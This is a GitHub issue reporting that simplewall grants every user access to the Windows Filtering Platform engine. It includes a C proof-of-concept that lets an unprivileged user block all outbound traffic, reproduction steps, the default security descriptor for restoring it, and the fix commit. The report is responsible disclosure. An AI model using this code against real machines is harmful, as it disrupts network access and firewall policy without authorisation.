Simplewall: Security: Unprivileged users have full access to the filter engine

Created on 8 May 2020 · 4Comments · Source: henrypp/simplewall

Simplewall grants Everyone (i.e. S-1-1-0) access to the filter engine with FwpmEngineSetSecurityInfo()

That means all unprivileged users have full access to the filter engine, which is supposed to require Admin.

Even if you uninstall simplewall, that change will persist. If you have ever clicked "Enable Filters", then all unprivileged users have access to the filter engine, even sandboxed low integrity processes.

I wondered why I suddenly stopped needing UAC to use FwpmFilterAdd0, and then noticed this bug.

I think there needs to be an update that:

Stops doing that.
Restores the default ACL.
Provide a little utility that fixes it for users who have uninstalled simplewall?

Here is a utility to verify this vulnerability, it creates a filter to block all outbound traffic. It should not work unless you are running as Administrator

#include <stdio.h>
#include <windows.h>
#include <fwpmu.h>

#pragma comment(lib, "FWPUCLNT")

int main(int argc, char **argv)
{
    HANDLE engineHandle;
    FWPM_FILTER0 fwpFilter;
    UINT64 FilterId;
    FWPM_SESSION0 fwpSession = {
        .flags = FWPM_SESSION_FLAG_DYNAMIC
    };

    ZeroMemory(&fwpFilter, sizeof(FWPM_FILTER0));

    if (FwpmEngineOpen0(NULL,
                        RPC_C_AUTHN_DEFAULT,
                        NULL,
                        &fwpSession,
                        &engineHandle) != ERROR_SUCCESS) {
        fprintf(stderr, "FwpmEngineOpen0 failed, %#X\n", GetLastError());
        return 1;
    }

    // Block all outbound traffic
    fwpFilter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
    fwpFilter.action.type = FWP_ACTION_BLOCK;
    fwpFilter.displayData.name = L"Testing FwpmEngineSetSecurityInfo";

    if (FwpmFilterAdd0(engineHandle, &fwpFilter, NULL, &FilterId) != ERROR_SUCCESS) {
        fprintf(stderr, "FwpmFilterAdd0 failed, %#x\n", GetLastError());
        return 1;
    }

    fprintf(stderr, "Success: Press any key To remove filter...\n");

    _getch();

    FwpmFilterDeleteById0(engineHandle, FilterId);
    FwpmEngineClose0(engineHandle);
    return 0;
}

To reproduce this problem, on a machine that has never had simplewall installed, create an unprivileged user and run the program above.

It should say FwpmFilterAdd0 failed 5 (i.e. Access Denied).

Now install simplewall, and run it at least once, you can uninstall it after that if you like.

Now run it again, and it should say "Success", and it is able to block all outbound traffic.

C:\WINDOWS\system32>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
C:\WINDOWS\system32>testwall.exe
Success: Press any key To remove filter...

bug development

Source

taviso

👍3

Most helpful comment

@henrypp Should be consided a high priority security risk, don't you think?

Could you tell us why this is happening, too?

ltGuillaume on 17 May 2020

👍3

All 4 comments

Wow, this is bad... Thanks for reporting, hoping for a swift solution.

ltGuillaume on 10 May 2020

👍1

I wrote some code to reset the SD to the default, you can take a look here:

https://gist.github.com/taviso/b65562b083c9b5cf98adfa0642845aa2

The default has a complicated DACL, here it is from a Windows 10 1909 Machine:

O:BAG:LSD:AI(A;;0xf07ff;;;BA)(A;OICIIO;GA;;;BA)(A;;0x307ff;;;NO)(A;OICIIO;GXGWGR;;;NO)(A;;0x307ff;;;
S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)(A
;OICIIO;GXGWGR;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)(A;;0x203f4;;;S-1-5-
80-3141615172-2057878085-1754447212-2405740020-3916490453)(A;OICIIO;GXGR;;;S-1-5-80-3141615172-20578
78085-1754447212-2405740020-3916490453)(A;;0x307ff;;;S-1-5-80-3044542841-3639452079-4096941652-16066
87743-1256249853)(A;OICIIO;GXGWGR;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)
(A;;0x307ff;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)(A;OICIIO;GXGWGR;;;S-1-5
-80-979556362-403687129-3954533659-2335141334-1547273080)(A;;0x203f4;;;S-1-5-80-3139157870-298339104
5-3678747466-658725712-1809340420)(A;OICIIO;GXGR;;;S-1-5-80-3139157870-2983391045-3678747466-6587257
12-1809340420)(A;;0x307ff;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)(A;OICIIO
;GXGWGR;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)(A;OICI;RPDT;;;WD)

Those are a bunch of Service SIDs, like MpsSvc and NlaSvc. I think we should put those back, removing them might break something.

Here they are decoded:

    "O:LS"  // Owner: Local service
    "G:LS"  // Group: Local service
    "D:AI"  // Dacl: (Auto Inherited)

    // Builtin Administrators
    "(A;;0xf07ff;;;BA)"
    "(A;OICIIO;GA;;;BA)"

    // Network configuration operators
    "(A;;0x307ff;;;NO)"
    "(A;OICIIO;GXGWGR;;;NO)"

    // MpsSvc (Malware Protection)
    "(A;;0x307ff;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)"
    "(A;OICIIO;GXGWGR;;;S-1-5-80-3088073201-1464728630-1879813800-1107566885-823218052)"

    // NlaSvc (Network Location Awareness)
    "(A;;0x203f4;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)"
    "(A;OICIIO;GXGR;;;S-1-5-80-3141615172-2057878085-1754447212-2405740020-3916490453)"

    // PolicyAgent
    "(A;;0x307ff;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)"
    "(A;OICIIO;GXGWGR;;;S-1-5-80-3044542841-3639452079-4096941652-1606687743-1256249853)"

    // RpcSs
    "(A;;0x307ff;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)"
    "(A;OICIIO;GXGWGR;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)"

    // WdiServiceHost
    "(A;;0x203f4;;;S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420)"
    "(A;OICIIO;GXGR;;;S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420)"

    // IKE/IpSec
    "(A;;0x307ff;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)"
    "(A;OICIIO;GXGWGR;;;S-1-5-80-1510742542-3632397484-604094731-3920060944-1272132581)"

    // Everyone (Write Properties / Delete Subtree)
    "(A;OICI;RPDT;;;WD)";

I can't seem to change the owner back to O:LS, I guess it's not a huge deal, O:BA is good enough. But do you know why? It would be nice to put it back the way it was if possible!

taviso on 14 May 2020

👍3

@henrypp Should be consided a high priority security risk, don't you think?

Could you tell us why this is happening, too?

ltGuillaume on 17 May 2020

👍3

It's fixed in https://github.com/henrypp/simplewall/commit/1919797c98f7566c927ab1a70c64179c38492c13. Thank you for report!